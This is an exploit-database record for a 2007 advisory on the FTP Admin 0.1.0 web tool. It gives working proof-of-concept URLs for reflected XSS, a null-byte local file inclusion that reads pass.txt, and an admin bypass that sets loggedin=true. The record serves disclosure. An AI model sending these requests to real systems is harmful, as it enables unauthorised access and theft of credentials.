ftp admin 0.1.0 (lfi/xss/ab) Multiple Vulnerabilities

2014-07-01T00:00:00

Description

No description provided by source.

{"enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "enchantments_done": [], "href": "https://www.seebug.org/vuldb/ssvid-65017", "id": "SSV:65017", "sourceHref": "https://www.seebug.org/vuldb/ssvid-65017", "description": "No description provided by source.", "type": "seebug", "cvss": {"score": 0.0, "vector": "NONE"}, "lastseen": "2017-11-19T17:18:13", "references": [], "modified": "2014-07-01T00:00:00", "reporter": "Root", "status": "cve,poc", "viewCount": 3, "published": "2014-07-01T00:00:00", "cvelist": [], "title": "ftp admin 0.1.0 (lfi/xss/ab) Multiple Vulnerabilities", "sourceData": "\n FTP Admin v0.1.0 - MULTIPLE VULNERABILITIES\r\n\tby Omni\r\n\r\n1) Infos\r\n---------\r\nDate : 2007-11-28\r\nProduct : FTP Admin\r\nVersion : v0.1.0\r\nVendor : http://sourceforge.net/projects/ftpadmin/\r\nVendor Status : 2007-11-30 Informed!\r\n\r\nDescription : FTP admin is a web-based user administration tool, for usage in combination with vsftpd. FTP admin\r\n requires sudo. Features include modification of users and generation of user passwords.\r\n\r\nSource : omnipresent - omni\r\nE-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]net\r\nTeam : Playhack.net Security\r\n\r\n2) Security Issues\r\n-------------------\r\n\r\n--- [ XSS ] ---\r\n===============================================\r\n\r\nI think that is better let you see a PoC instead of explain where is the bug.. If you want to know it just look at the \r\nsource code.\r\n\r\n--- [ PoC ] ---\r\n===============\r\n\r\nhttp://localhost/ft/index.php?page=error&error=<b>...</b>\r\nhttp://localhost/ft/index.php?page=error&error=<script>alert(1)</script>\r\n\r\n\r\n--- [ Local File Inclusion ] ---\r\n================================\r\n\r\nTake a look in index.php, line 49:\r\ninclude("$page.php");\r\n\r\nRemembe that you have to log in to made local file inclusion (loggedin = true -> register_global = On)\r\n\r\n[ Remembe that ]\r\nif(!is_file($page . ".php") || (!is_readable($page . ".php"))) {\r\n\t\t$page = "error";\r\n\t\t$error = "Page does not exist or is not readable\\n";\r\n\t}\r\n}\r\n[ /Remembe that ]\r\n\r\n--- [ PoC ] ---\r\n===============\r\n\r\nhttp://localhost/ft/index.php?page=pass.txt%00&loggedin=true\r\n\r\nTo see pass.txt ...\r\n\r\n--- [ Admin Bypass ] ---\r\n================================\r\n\r\nToday I'm too lazy to explain what's wrong.. so take a look in the source code and watch the var $loggedin !!\r\n\r\n--- [ PoC ] ---\r\n===============\r\n\r\nTo add a user...\r\n\r\nhttp://localhost/ft/index.php?page=add&loggedin=true\r\n\r\n# milw0rm.com [2007-11-29]\r\n\n ", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645241261, "score": 1659785532, "epss": 1678850553}}